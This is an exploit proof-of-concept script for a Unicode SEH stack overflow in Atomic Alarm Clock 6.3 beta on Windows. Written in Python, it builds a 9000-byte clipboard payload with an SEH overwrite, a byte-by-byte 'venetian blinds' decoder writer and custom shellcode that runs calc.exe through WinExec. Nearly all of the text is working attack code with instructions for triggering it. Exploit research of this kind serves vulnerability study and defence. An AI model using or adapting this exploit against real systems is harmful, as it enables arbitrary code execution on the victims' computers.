


Atomic Alarm Clock 6.3 Stack Overflow ↭


# Exploit Title: Atomic Alarm Clock 6.3 - Venetian Blinds Zipper - Unicode SEH Stack Overflow
# Exploit Author: Bobby Cooke
# Date: April 17th, 2020
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/ataclock.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: Atomic Alarm Clock 6.3 beta
# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer

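# Flat PoC generator: assemble the SEH-overwrite buffer stage by stage and
# write it to poc.txt.  Every byte is spelled as a "\x.." escape (the page
# this was scraped from had lost the backslashes, which silently turned each
# byte into three ASCII characters) and the file is opened in binary mode so
# the bytes on disk are exactly the bytes assembled here.  The literals use
# the b'' prefix and // division so the script runs unchanged under
# Python 2 and Python 3.
File = 'poc.txt'

# Filler up to the SEH record.
os_nSEH = b'\x41' * 461
nSEH = b'\xeb\x05'  # jmp short +2
SEH = b'\x47\x47'   # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe]
# {PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False

# Stage 1: get a pointer to the payload into [ESP].
getPC = b'\x73'   # add [ebx], dh  -> nop, [EBX] is writable memory
getPC += b'\x61'  # popad          -> [ESP] = &Payload
getPC += b'\x72'  # add [edx], dh  -> realigns execution for 1-byte opcodes

ebx2eax = b'\x58'   # pop eax       -> EAX = &Payload
ebx2eax += b'\x72'  # add [edx], dh

# Adjust EAX to &Decoder.
getDecoder = b'\x05\x13\x11'   # add eax, 0x11001300  -> EAX + 512 bytes
getDecoder += b'\x72'          # add [edx], dh
getDecoder += b'\x2D\x11\x11'  # sub eax, 0x11001100  -> EAX = &Decoder
getDecoder += b'\x72'          # add [edx], dh
getDecoder += b'\x50'          # push eax             -> [ESP] = &Decoder
getDecoder += b'\x72'          # add [edx], dh

# Decoder bytes: the odd bytes are placed directly (firstHalf); the even
# bytes are patched in one at a time by the "venetian blinds" stage below.
# DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
firstHalf = b'\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50'
## 2nd byte - \x00 => \x5F
venBlinds = b'\x40\x72\xC6\x5F\x72\x40\x72\x40\x72'
## 4th byte - \x00 => \x33
venBlinds += b'\xC6\x33\x72\x40\x72\x40\x72'
## 6th byte - \x00 => \x33
venBlinds += b'\xC6\x33\x72\x40\x72\x40\x72'
## 8th byte - \x00 => \x66
venBlinds += b'\xC6\x66\x72\x40\x72\x40\x72'
## 10th byte - \x00 => \x10
venBlinds += b'\xC6\x10\x72\x40\x72\x40\x72'
## 12th byte - \x00 => \x33
venBlinds += b'\xC6\x33\x72\x40\x72\x40\x72'
## 14th byte - \x00 => \x42
venBlinds += b'\xC6\x42\x72\x40\x72\x40\x72'
## 16th byte - \x00 => \x32
venBlinds += b'\xC6\x32\x72\x40\x72\x40\x72'
## 18th byte - \x00 => \x02
venBlinds += b'\xC6\x02\x72\x40\x72\x40\x72'
## 20th byte - \x00 => \x10
venBlinds += b'\xC6\x10\x72\x40\x72\x40\x72'
## 22nd byte - \x00 => \x3F
venBlinds += b'\xC6\x3F\x72\x40\x72\x40\x72'
## 24th byte - \x00 => \x1F
venBlinds += b'\xC6\x1F\x72\x40\x72\x40\x72'
## 26th byte - \x00 => \x49
venBlinds += b'\xC6\x49\x72\x40\x72\x40\x72'
## 28th byte - \x00 => \x02
venBlinds += b'\xC6\x02\x72\x40\x72\x40\x72'
## 30th byte - \x00 => \xED
venBlinds += b'\xC6\xED\x72\x40\x72\x40\x72'
## 32nd byte - \x00 => \xC3
venBlinds += b'\xC6\xC3\x72\x40\x72'
# Jump to the decoded decoder by returning to the address saved on the stack.
venBlinds += b'\xC3'  # ret [!] Now we are executing the decoder!

# Pad the first stage to 512/2 = 256 bytes so the decoder sits at a fixed
# offset from the SEH record.  Integer division keeps the multiplier an int
# under Python 3 (512/2 would be a float there and raise TypeError).
os_decoder = b'\x90' * (512 // 2 - len(nSEH + SEH + getPC + ebx2eax + getDecoder + venBlinds))

# Custom PopCalc shellcode that avoids the bad characters.
fKernel32 = b'\x33\xF6\xF7\xE6\x64\x03\x52\x30\x03\x42\x0C\x03\x70\x1C\xAD\x50\x5E\xAD\xFF\x70\x08'

gExpotTbl = b'\x33\xC9\x33\xF6\x33\xDB\xF7\xE3\x58\x50\x03\x70\x3C\x03\xF0\x03\x56\x78\x03\xD0\x03\x5A\x20\x03\xD8\x03\x4A\x24\x03\xC8\x51\x33\xFF\x03\x7A\x1C\x03\xF8\x57'

fWinExec = b'\x68\x57\x69\x6E\x45\x33\xC0\x33\xF6\x03\xF4\xFC\x50\x33\xC9\x41\x41\x41\x41\xF7\xE1\x33\xFF\x03\x3C\x18\x58\x03\x7C\x24\x0C\xF3\xA6\x74\x03\x40\xEB\xE1\x33\xC9\x41\x41\xF7\xE1\x33\xC9\x03\x4C\x24\x08\x03\xC8\x33\xC0\x66\x03\x01\x33\xC9\x41\x41\x41\x41\xF7\xE1\xFF\x74\x24\x04\x01\x04\x24\x5A\x33\xDB\x03\x1A\x03\x5C\x24\x0C'

# Call WinExec( CmdLine, ShowState );
# CmdLine = "calc.exe"
# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec = b'\x33\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x33\xC0\x03\xC4\x41\x51\x50\xFF\xD3'

shellcode = fKernel32 + gExpotTbl + fWinExec + callWinExec

buffer = os_nSEH + nSEH + SEH + getPC + ebx2eax + getDecoder + venBlinds + os_decoder + firstHalf + shellcode
# Pad the whole buffer out to a fixed 9000 bytes.
filler = b'\x77' * (9000 - len(buffer))
buffer = buffer + filler

payload = buffer
# Actually write the buffer out.  Binary mode: no newline or encoding
# translation of bytes >= 0x80.  On failure report it and re-raise rather
# than pretending the file exists.
try:
    with open(File, 'wb') as f:
        f.write(payload)
except (IOError, OSError):
    print(File + ' failed to create')
    raise
else:
    print(File + " created successfully")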
